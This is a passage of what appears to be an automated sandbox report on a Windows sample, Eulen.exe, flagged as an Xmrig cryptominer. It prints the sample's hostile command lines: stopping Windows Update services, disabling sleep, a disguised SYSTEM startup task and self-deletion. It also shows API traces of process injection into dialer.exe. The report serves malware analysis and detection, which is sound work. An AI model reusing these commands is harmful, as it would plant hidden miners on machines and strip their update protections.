Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:28:33
Start date:	08/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Imagebase:	0x7ff722520000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:28:33
Start date:	08/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:28:33
Start date:	08/11/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop UsoSvc
Imagebase:	0x7ff720fa0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:28:33
Start date:	08/11/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop WaaSMedicSvc
Imagebase:	0x7ff720fa0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	05:28:33
Start date:	08/11/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop wuauserv
Imagebase:	0x7ff720fa0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	05:28:33
Start date:	08/11/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop bits
Imagebase:	0x7ff720fa0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	05:28:33
Start date:	08/11/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop dosvc
Imagebase:	0x7ff720fa0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	05:28:33
Start date:	08/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff722520000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	05:28:33
Start date:	08/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	05:28:33
Start date:	08/11/2024
Path:	C:\Windows\System32\dialer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\dialer.exe
Imagebase:	0x7ff75c730000
File size:	39'936 bytes
MD5 hash:	B2626BDCF079C6516FC016AC5646DF93
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	05:28:33
Start date:	08/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gymatom#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	05:28:33
Start date:	08/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	05:28:33
Start date:	08/11/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-ac 0
Imagebase:	0x7ff707d00000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	05:28:33
Start date:	08/11/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-dc 0
Imagebase:	0x7ff707d00000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	05:28:33
Start date:	08/11/2024
Path:	C:\Windows\System32\winlogon.exe
Wow64 process (32bit):	false
Commandline:	winlogon.exe
Imagebase:	0x7ff6cc5a0000
File size:	906'240 bytes
MD5 hash:	F8B41A1B3E569E7E6F990567F21DCE97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	05:28:34
Start date:	08/11/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-ac 0
Imagebase:	0x7ff707d00000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	05:28:34
Start date:	08/11/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff707d00000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	05:28:34
Start date:	08/11/2024
Path:	C:\Windows\System32\lsass.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\lsass.exe
Imagebase:	0x7ff6b5fa0000
File size:	59'456 bytes
MD5 hash:	A1CC00332BBF370654EE3DC8CDC8C95A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	05:28:35
Start date:	08/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	05:28:36
Start date:	08/11/2024
Path:	C:\Windows\System32\dwm.exe
Wow64 process (32bit):	false
Commandline:	"dwm.exe"
Imagebase:	0x7ff7751a0000
File size:	94'720 bytes
MD5 hash:	5C27608411832C5B39BA04E33D53536C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	26
Start time:	05:28:39
Start date:	08/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	05:28:39
Start date:	08/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	05:28:40
Start date:	08/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	05:28:40
Start date:	08/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	05:28:40
Start date:	08/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	05:28:41
Start date:	08/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	05:28:41
Start date:	08/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	05:28:42
Start date:	08/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	05:28:44
Start date:	08/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	05:28:44
Start date:	08/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Eulen.exe"
Imagebase:	0x7ff722520000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	05:28:44
Start date:	08/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	05:28:45
Start date:	08/11/2024
Path:	C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe"
Imagebase:	0x7ff606d30000
File size:	44'977'152 bytes
MD5 hash:	F8DD965FE02F49C93F22972470D480B3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.1776062016.00007FF609F4D000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000027.00000002.1776062016.00007FF609F4D000.00000004.00000001.01000000.00000009.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 16%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	05:28:44
Start date:	08/11/2024
Path:	C:\Windows\System32\choice.exe
Wow64 process (32bit):	false
Commandline:	choice /C Y /N /D Y /T 3
Imagebase:	0x7ff7a7cc0000
File size:	35'840 bytes
MD5 hash:	1A9804F0C374283B094E9E55DC5EE128
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	05:28:44
Start date:	08/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	05:28:45
Start date:	08/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	05:28:46
Start date:	08/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	44
Start time:	05:28:46
Start date:	08/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	45
Start time:	05:28:46
Start date:	08/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	46
Start time:	05:28:46
Start date:	08/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	05:28:47
Start date:	08/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	48
Start time:	05:28:47
Start date:	08/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	49
Start time:	05:28:47
Start date:	08/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	50
Start time:	05:28:48
Start date:	08/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	156
Start time:	05:28:56
Start date:	08/11/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	165
Start time:	05:28:56
Start date:	08/11/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	48%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	66.4%
Total number of Nodes:	232
Total number of Limit Nodes:	25

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FF647342328 Relevance: 68.4, APIs: 31, Strings: 8, Instructions: 194
registrymemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF647342078: StrCpyW.SHLWAPI ref: 00007FF6473420AA
Part of subcall function 00007FF647342078: StrCatW.SHLWAPI ref: 00007FF6473420B8
Part of subcall function 00007FF647342078: GetModuleHandleW.KERNEL32 ref: 00007FF6473420C1
Part of subcall function 00007FF647342078: GetCurrentProcess.KERNEL32 ref: 00007FF64734210C
Part of subcall function 00007FF647342078: K32GetModuleInformation.KERNEL32 ref: 00007FF647342120
Part of subcall function 00007FF647342078: CreateFileW.KERNELBASE ref: 00007FF647342150
Part of subcall function 00007FF647342078: CreateFileMappingW.KERNELBASE ref: 00007FF64734217B
Part of subcall function 00007FF647342078: MapViewOfFile.KERNELBASE ref: 00007FF64734219F
Part of subcall function 00007FF647342078: lstrcmpiA.KERNEL32 ref: 00007FF6473421EA
Part of subcall function 00007FF647342078: CloseHandle.KERNELBASE ref: 00007FF647342258
Part of subcall function 00007FF647342078: CloseHandle.KERNEL32 ref: 00007FF647342261
Part of subcall function 00007FF647342078: FreeLibrary.KERNEL32 ref: 00007FF64734226A

VerSetConditionMask.NTDLL ref: 00007FF647342397
VerSetConditionMask.NTDLL ref: 00007FF6473423A8
VerSetConditionMask.NTDLL ref: 00007FF6473423B9
VerifyVersionInfoW.KERNEL32 ref: 00007FF6473423CC
GetCurrentProcessId.KERNEL32 ref: 00007FF6473423DE
OpenProcess.KERNEL32 ref: 00007FF6473423EE
OpenProcessToken.ADVAPI32 ref: 00007FF64734240F
LookupPrivilegeValueW.ADVAPI32 ref: 00007FF647342429
AdjustTokenPrivileges.KERNELBASE ref: 00007FF64734246D
GetLastError.KERNEL32 ref: 00007FF647342477
CloseHandle.KERNELBASE ref: 00007FF647342480
FindResourceExA.KERNEL32 ref: 00007FF647342494
SizeofResource.KERNEL32 ref: 00007FF6473424AB
LoadResource.KERNEL32 ref: 00007FF6473424C4
LockResource.KERNEL32 ref: 00007FF6473424D6
GetCurrentProcessId.KERNEL32 ref: 00007FF6473424E3
RegCreateKeyExW.KERNELBASE ref: 00007FF647342524
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF647342557
RegSetKeySecurity.KERNELBASE ref: 00007FF647342574
LocalFree.KERNEL32 ref: 00007FF647342581
RegCreateKeyExW.KERNELBASE ref: 00007FF6473425B9
GetCurrentProcessId.KERNEL32 ref: 00007FF6473425C3
RegSetValueExW.KERNELBASE ref: 00007FF6473425F1
RegCloseKey.KERNELBASE ref: 00007FF6473425FC
RegCloseKey.ADVAPI32 ref: 00007FF647342607
CreateThread.KERNELBASE ref: 00007FF647342628
GetProcessHeap.KERNEL32 ref: 00007FF64734262E
HeapAlloc.KERNEL32 ref: 00007FF64734263D
CreateThread.KERNELBASE ref: 00007FF64734266C
CreateThread.KERNELBASE ref: 00007FF64734268D
SleepEx.KERNELBASE ref: 00007FF647342695

Strings

kernel32.dll, xrefs: 00007FF6473423D2
svc64, xrefs: 00007FF6473425CE
ntdll.dll, xrefs: 00007FF64734233B
SOFTWARE\dialerconfig, xrefs: 00007FF6473424FF
SeDebugPrivilege, xrefs: 00007FF647342422
pid, xrefs: 00007FF647342596
D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA), xrefs: 00007FF647342550
DLL, xrefs: 00007FF647342486

Memory Dump Source

Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true

Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd

Similarity

API ID: CreateProcess$Close$CurrentHandleResource$ConditionFileMaskSecurityThread$DescriptorFreeHeapModuleOpenTokenValue$AdjustAllocConvertErrorFindInfoInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringVerifyVersionViewlstrcmpi
String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
API String ID: 2439791646-1130149537
Opcode ID: 64f5cfc841401fc1be0d0af11d06bbf6443494d40dab24e71934df2300a70ca7
Instruction ID: 2c2eca0257cbb2cdbf09cbc70523e5db35885e311136b59993751dd1c28690d6
Opcode Fuzzy Hash: 64f5cfc841401fc1be0d0af11d06bbf6443494d40dab24e71934df2300a70ca7
Instruction Fuzzy Hash: 5FA11C36A0CB82D6E72AFF21E8442A973A1FB88754F404135DA4E97B64DF7ED548DB00

Function 00007FF6473410C0 Relevance: 52.8, APIs: 25, Strings: 5, Instructions: 259
memorystringnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6473419AC: OpenProcess.KERNEL32(?,?,?,00007FF64734110E), ref: 00007FF6473419CA
Part of subcall function 00007FF6473419AC: IsWow64Process.KERNEL32(?,?,?,00007FF64734110E), ref: 00007FF6473419E0
Part of subcall function 00007FF6473419AC: CloseHandle.KERNELBASE(?,?,?,00007FF64734110E), ref: 00007FF6473419FB

OpenProcess.KERNEL32 ref: 00007FF64734112C
OpenProcess.KERNEL32 ref: 00007FF64734114B
K32GetModuleFileNameExW.KERNEL32 ref: 00007FF647341170
PathFindFileNameW.SHLWAPI ref: 00007FF64734117E
lstrlenW.KERNEL32 ref: 00007FF64734118A
StrCpyW.SHLWAPI ref: 00007FF6473411A1
CloseHandle.KERNEL32 ref: 00007FF6473411AD
StrCmpIW.SHLWAPI ref: 00007FF6473411ED
NtQueryInformationProcess.NTDLL ref: 00007FF647341221
OpenProcessToken.ADVAPI32 ref: 00007FF64734124B
GetTokenInformation.KERNELBASE ref: 00007FF647341277
GetLastError.KERNEL32 ref: 00007FF647341281
LocalAlloc.KERNEL32 ref: 00007FF647341294
GetTokenInformation.KERNELBASE ref: 00007FF6473412C0
GetSidSubAuthorityCount.ADVAPI32 ref: 00007FF6473412CD
GetSidSubAuthority.ADVAPI32 ref: 00007FF6473412DC
LocalFree.KERNEL32 ref: 00007FF6473412F4
CloseHandle.KERNEL32 ref: 00007FF647341308
StrStrA.SHLWAPI ref: 00007FF6473413B2
VirtualAllocEx.KERNELBASE ref: 00007FF647341419
WriteProcessMemory.KERNELBASE ref: 00007FF64734143C
WaitForSingleObject.KERNEL32 ref: 00007FF647341488
GetExitCodeThread.KERNEL32 ref: 00007FF64734149E
CloseHandle.KERNELBASE ref: 00007FF6473414B6
CloseHandle.KERNEL32 ref: 00007FF6473414BF

Strings

dialer.exe, xrefs: 00007FF6473411D8
@, xrefs: 00007FF64734140C
MSBuild.exe, xrefs: 00007FF6473411B8
WmiPrvSE.exe, xrefs: 00007FF6473411CC
ReflectiveDllMain, xrefs: 00007FF6473413A8

Memory Dump Source

Source File: 0000000E.00000002.1759521255.00007FF647341000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF647340000, based on PE: true

Associated: 0000000E.00000002.1759098206.00007FF647340000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759560705.00007FF647343000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.1759592325.00007FF647346000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff647340000_dialer.jbxd

Similarity

API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
String ID: @$MSBuild.exe$ReflectiveDllMain$WmiPrvSE.exe$dialer.exe
API String ID: 2561231171-2835194517
